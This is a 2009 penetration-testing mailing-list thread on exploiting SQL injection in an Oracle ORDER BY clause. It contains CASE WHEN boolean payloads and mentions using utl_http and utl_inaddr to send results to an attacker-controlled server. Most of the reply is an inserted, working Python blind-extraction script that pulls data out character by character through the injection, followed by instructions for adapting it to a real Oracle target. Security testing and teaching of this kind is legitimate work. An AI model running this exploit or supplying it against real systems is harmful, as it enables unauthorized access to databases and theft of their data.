RE: ORDER BY sql injection help



For Oracle, after an ORDER BY you can inject something like:

CASE WHEN (1=1) THEN <column_name1> ELSE <column_name2> END
CASE WHEN (1=0) THEN <column_name1> ELSE <column_name2> END

If you see different ORDER BY results for the two queries above, then you
should be able to use various tools to exploit and extract data from the
Oracle database. You might also be able to execute utl_http.request (requests
to your web server) or utl_inaddr.get_host_address (requests to a domain that
you own, and sniffing) to get the results back to you more easily.

SuRGeoN
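The technique above, worked through as an added example (not code from the original post or from either poster): the CASE WHEN payload turns an injectable ORDER BY into a yes/no oracle, and a binary search over ASCII(SUBSTR(...)) then pulls a string out one character at a time, about seven requests per character. The vulnerable application is a constructed stand-in: SQLite takes the place of Oracle, ASCII() is registered by hand so that it returns NULL for an empty input (as Oracle's ASCII(NULL) does), and a one-row table named dual with a column named user mimics SELECT user FROM dual. The table and column names (items, id, name), the sort parameter and the secret value SCOTT are all assumptions made for the demo. The out-of-band channels mentioned in the reply (utl_http, utl_inaddr) are not shown here.

```python
import sqlite3
from typing import Callable, List, Tuple

Rows = List[Tuple[int, str]]

# --- Constructed stand-in for the vulnerable application --------------------
# SQLite plays the part of Oracle. ASCII() is registered by hand and returns
# NULL for an empty/NULL input, matching Oracle's ASCII(NULL). A one-row "dual"
# table with a "user" column stands in for Oracle's SELECT user FROM dual.
SECRET_USER = "SCOTT"  # constructed value that the attacker does not know


def make_vulnerable_app() -> Callable[[str], Rows]:
    conn = sqlite3.connect(":memory:")
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else None)
    conn.execute("CREATE TABLE items(id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "zebra"), (2, "apple"), (3, "mango")])
    conn.execute("CREATE TABLE dual(user TEXT)")
    conn.execute("INSERT INTO dual VALUES (?)", (SECRET_USER,))

    def query(sort_param: str) -> Rows:
        # The bug from the original post: the GET parameter is pasted into ORDER BY.
        sql = f"SELECT id, name FROM items ORDER BY {sort_param}"
        return conn.execute(sql).fetchall()

    return query


# --- Attacker side -----------------------------------------------------------
def case_payload(condition: str, true_col: str = "id", false_col: str = "name") -> str:
    # The shape from the reply: sort by one column when the condition holds,
    # by a different column when it does not.
    return f"CASE WHEN ({condition}) THEN {true_col} ELSE {false_col} END"


def confirm_injection(query: Callable[[str], Rows]) -> bool:
    # First check from the reply: 1=1 and 1=0 must produce different orderings.
    return query(case_payload("1=1")) != query(case_payload("1=0"))


class OrderByOracle:
    """Answers yes/no questions by comparing the row order against the 1=1 baseline."""

    def __init__(self, query: Callable[[str], Rows]):
        self.query = query
        self.true_order = query(case_payload("1=1"))
        self.false_order = query(case_payload("1=0"))
        if self.true_order == self.false_order:
            raise RuntimeError("orderings identical; choose two columns that sort differently")
        self.requests = 2

    def ask(self, condition: str) -> bool:
        self.requests += 1
        return self.query(case_payload(condition)) == self.true_order


def extract_string(oracle: OrderByOracle, expr: str, max_len: int = 30) -> str:
    """Binary-search each character of the scalar subquery `expr` (printable ASCII only)."""
    out = []
    for pos in range(1, max_len + 1):
        char_expr = f"ASCII(SUBSTR(({expr}),{pos},1))"
        # Past the end of the string SUBSTR yields NULL/empty, ASCII yields NULL,
        # NULL > 0 is not true, and the CASE falls into the ELSE branch.
        if not oracle.ask(f"{char_expr} > 0"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"{char_expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    app = make_vulnerable_app()
    print("injectable:", confirm_injection(app))
    oracle = OrderByOracle(app)
    print("current user:", extract_string(oracle, "SELECT user FROM dual"))
    print("requests used:", oracle.requests)
```

Against a real Oracle target, the only thing that changes is the query function: it issues the GET request with the payload in the sort parameter and returns the order of rows scraped from the page. Pick two columns whose sort orders actually differ on the returned page, or the baseline comparison in OrderByOracle will refuse to proceed.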

-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] On
Behalf Of lister@xxxxxxxxx
Sent: Thursday, June 11, 2009 9:46 PM
To: pen-test@xxxxxxxxxxxxxxxxx
Subject: ORDER BY sql injection help

Requesting assistance.

An application uses GET and one of the parameters translates to an ORDER BY
in an Oracle SQL query.

I can put in 1 through X where X is a column number to order the output up
to X columns.

I can also get ORA errors, so I know I have direct access to the SQL query.

I'm looking for references on possible queries for a query with an injectable
ORDER BY clause. I'm not sure if it is possible to break out of the ORDER BY
to query other data.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually
do a proper penetration test. IACRB CPT and CEPT certs require a full
practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------


